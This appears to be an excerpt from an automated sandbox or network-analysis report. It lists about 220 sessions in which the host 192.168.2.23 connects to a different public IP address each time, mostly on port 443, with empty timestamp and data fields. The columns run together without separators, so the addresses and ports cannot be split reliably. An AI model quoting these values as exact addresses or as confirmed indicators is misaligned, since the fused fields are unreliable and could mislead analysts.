                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20833192.168.2.2354890168.63.47.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20834192.168.2.233810643.0.244.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20835192.168.2.234147838.42.178.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20836192.168.2.2358046172.37.135.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20837192.168.2.235036634.119.36.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20838192.168.2.235126873.177.55.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20839192.168.2.2338412201.68.159.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20840192.168.2.233389276.14.149.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20841192.168.2.2344922180.135.170.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20842192.168.2.2360734128.194.36.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20843192.168.2.2349068206.34.23.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20844192.168.2.23431884.6.11.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20845192.168.2.235527245.97.23.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20846192.168.2.235095848.209.89.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20847192.168.2.2357628130.63.80.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20848192.168.2.2357664121.166.10.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20849192.168.2.233518079.13.241.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20850192.168.2.234827225.172.189.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20851192.168.2.23533144.20.210.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20852192.168.2.2357274195.243.200.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20853192.168.2.2356434150.199.192.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20854192.168.2.235411073.11.165.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20855192.168.2.2352280159.31.125.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20856192.168.2.2356878197.155.46.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20857192.168.2.2334652182.251.133.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20858192.168.2.234827082.58.141.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20859192.168.2.2333720143.148.90.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20860192.168.2.233673631.121.54.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20861192.168.2.233907039.139.42.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20862192.168.2.2347318153.219.144.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20863192.168.2.233955619.104.109.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20864192.168.2.2349524138.61.132.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20865192.168.2.2357262140.38.238.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20866192.168.2.2332958176.241.220.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20867192.168.2.2359112137.108.109.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20868192.168.2.2344036121.1.19.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20869192.168.2.235659084.59.201.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20870192.168.2.2336414219.188.88.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20871192.168.2.2333136133.131.205.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20872192.168.2.2346228145.163.202.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20873192.168.2.2357100101.154.201.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20874192.168.2.2344792200.71.127.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20875192.168.2.2344358166.216.203.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20876192.168.2.2336190115.64.142.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20877192.168.2.2339382142.237.199.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20878192.168.2.2335574194.43.78.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20879192.168.2.2347108167.114.145.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20880192.168.2.2347436107.25.98.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20881192.168.2.23526961.143.115.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20882192.168.2.2342580118.158.57.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20883192.168.2.2337616173.204.216.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20884192.168.2.236062670.96.54.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20885192.168.2.234097468.18.145.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20886192.168.2.2358446221.223.42.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20887192.168.2.234603060.241.36.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20888192.168.2.2336784180.183.97.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20889192.168.2.2342930117.60.19.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20890192.168.2.235392060.80.184.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20891192.168.2.235890297.250.121.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20892192.168.2.2357828211.81.232.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20893192.168.2.2344734197.229.246.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20894192.168.2.2346884194.229.242.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20895192.168.2.234571041.246.186.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20896192.168.2.233620264.161.39.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20897192.168.2.235491897.68.116.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20898192.168.2.2338194167.8.88.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20899192.168.2.2351916182.30.197.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20900192.168.2.2355138163.144.98.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20901192.168.2.2338956142.247.8.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20902192.168.2.2356880221.17.224.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20903192.168.2.234829852.90.112.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20904192.168.2.2347088181.144.135.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20905192.168.2.233551261.151.75.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20906192.168.2.2334530163.148.101.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20907192.168.2.2350264122.63.21.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20908192.168.2.234639049.32.21.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20909192.168.2.2353010110.131.84.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20910192.168.2.234177291.43.177.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20911192.168.2.23436068.252.31.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20912192.168.2.2334012107.31.134.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20913192.168.2.2354720106.98.40.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20914192.168.2.233782467.107.5.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20915192.168.2.2340178192.228.42.1128080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20916192.168.2.235404243.195.67.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20917192.168.2.2343830113.133.147.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20918192.168.2.2356036200.230.135.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20919192.168.2.2341518154.6.191.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20920192.168.2.2351718150.38.195.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20921192.168.2.2351640176.176.99.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20922192.168.2.234728418.48.0.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20923192.168.2.2336664106.4.78.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20924192.168.2.235744294.202.197.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20925192.168.2.235145240.215.111.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20926192.168.2.233895034.101.184.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20927192.168.2.2347596121.136.26.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20928192.168.2.234918681.0.115.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20929192.168.2.235046223.237.46.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20930192.168.2.2354806218.193.2.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20931192.168.2.234735658.226.203.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20932192.168.2.2351700118.194.220.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20933192.168.2.2337708176.87.249.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20934192.168.2.233488473.223.168.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20935192.168.2.2351268190.208.27.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20936192.168.2.2339330159.86.33.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20937192.168.2.235012019.199.143.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20938192.168.2.235261894.136.76.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20939192.168.2.2346424205.107.157.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20940192.168.2.2337834137.144.63.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20941192.168.2.2358040117.73.202.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20942192.168.2.235350241.43.93.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20943192.168.2.2346170101.89.125.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20944192.168.2.233875878.225.126.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20945192.168.2.2357954133.21.34.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20946192.168.2.2338384117.26.13.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20947192.168.2.2341208160.31.164.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20948192.168.2.2352326200.45.117.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20949192.168.2.233403866.229.248.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20950192.168.2.235269669.237.27.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20951192.168.2.2356546163.124.18.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20952192.168.2.234503883.102.120.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20953192.168.2.2335758186.94.130.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20954192.168.2.2333972144.25.124.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20955192.168.2.2359784177.96.189.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20956192.168.2.23577762.5.41.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20957192.168.2.23602868.225.161.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20958192.168.2.2358056178.55.127.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20959192.168.2.2356588101.3.67.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20960192.168.2.2354404152.141.235.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20961192.168.2.2335704145.28.251.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20962192.168.2.2358486151.30.200.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20963192.168.2.2358976203.25.240.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20964192.168.2.235318692.173.192.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20965192.168.2.2358738135.69.151.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20966192.168.2.234986086.3.2.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20967192.168.2.2350012167.74.3.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20968192.168.2.235123459.247.22.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20969192.168.2.2338488108.102.45.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20970192.168.2.2335726196.200.171.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20971192.168.2.2335828118.229.43.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20972192.168.2.234218262.146.52.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20973192.168.2.2356054140.32.180.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20974192.168.2.2335712207.151.164.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20975192.168.2.233480247.230.245.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20976192.168.2.235050046.168.148.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20977192.168.2.234843434.175.170.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20978192.168.2.235918481.176.88.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20979192.168.2.2353734117.152.55.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20980192.168.2.235789643.169.203.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20981192.168.2.235911486.15.112.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20982192.168.2.234776661.224.240.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20983192.168.2.234266665.166.222.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20984192.168.2.2359838200.200.29.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20985192.168.2.235195637.183.239.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20986192.168.2.235227051.0.175.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20987192.168.2.2334884124.138.160.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20988192.168.2.23417009.114.139.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20989192.168.2.2360090207.217.88.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20990192.168.2.233709091.221.206.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20991192.168.2.233939294.231.2.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20992192.168.2.2335076121.123.7.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20993192.168.2.233522662.140.147.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20994192.168.2.2348208166.203.139.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20995192.168.2.2359824159.105.85.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20996192.168.2.2352244199.206.121.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20997192.168.2.234338218.65.54.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20998192.168.2.2346838120.149.104.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20999192.168.2.2339708148.29.7.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21000192.168.2.2334466146.151.196.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21001192.168.2.2346694141.20.8.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21002192.168.2.2333458208.147.209.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21003192.168.2.2339346129.80.48.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21004192.168.2.2352334149.65.135.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21005192.168.2.2346312196.27.82.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21006192.168.2.2344330115.185.199.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21007192.168.2.233423466.138.194.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21008192.168.2.2346744162.83.117.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21009192.168.2.2348164122.1.34.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21010192.168.2.2338552206.143.188.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21011192.168.2.2347710159.61.254.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21012192.168.2.2343004171.25.28.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21013192.168.2.2343374119.73.196.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21014192.168.2.2352912189.32.254.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21015192.168.2.2348868118.211.14.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21016192.168.2.2336512107.105.49.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21017192.168.2.235284231.18.254.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21018192.168.2.2351338140.77.63.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21019192.168.2.2349342170.222.71.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21020192.168.2.2360990122.106.32.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21021192.168.2.2352474204.146.104.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21022192.168.2.233904865.215.244.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21023192.168.2.2360048121.223.71.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21024192.168.2.2339252161.251.46.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21025192.168.2.234025218.58.74.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21026192.168.2.2340740148.113.251.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21027192.168.2.2333754163.114.133.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21028192.168.2.2338586168.79.37.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21029192.168.2.2359780108.67.177.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21030192.168.2.2357368184.96.111.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21031192.168.2.2337004159.7.65.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21032192.168.2.234742642.46.54.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21033192.168.2.23387064.245.197.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21034192.168.2.234677834.100.87.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21035192.168.2.234578896.17.179.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21036192.168.2.2336716196.98.37.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21037192.168.2.233277023.145.175.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21038192.168.2.2352564171.163.114.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21039192.168.2.233872443.167.29.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21040192.168.2.23402021.108.98.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21041192.168.2.2336746155.238.109.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21042192.168.2.234471471.95.159.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21043192.168.2.2345348155.222.160.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21044192.168.2.233408076.102.20.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21045192.168.2.234309897.50.225.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21046192.168.2.23538265.160.69.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21047192.168.2.2337096162.180.27.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21048192.168.2.2340888104.130.58.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21049192.168.2.2340570107.28.192.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21050192.168.2.2341328119.13.184.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21051192.168.2.234105612.253.64.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21052192.168.2.235115285.128.119.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21053192.168.2.2346060143.54.72.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
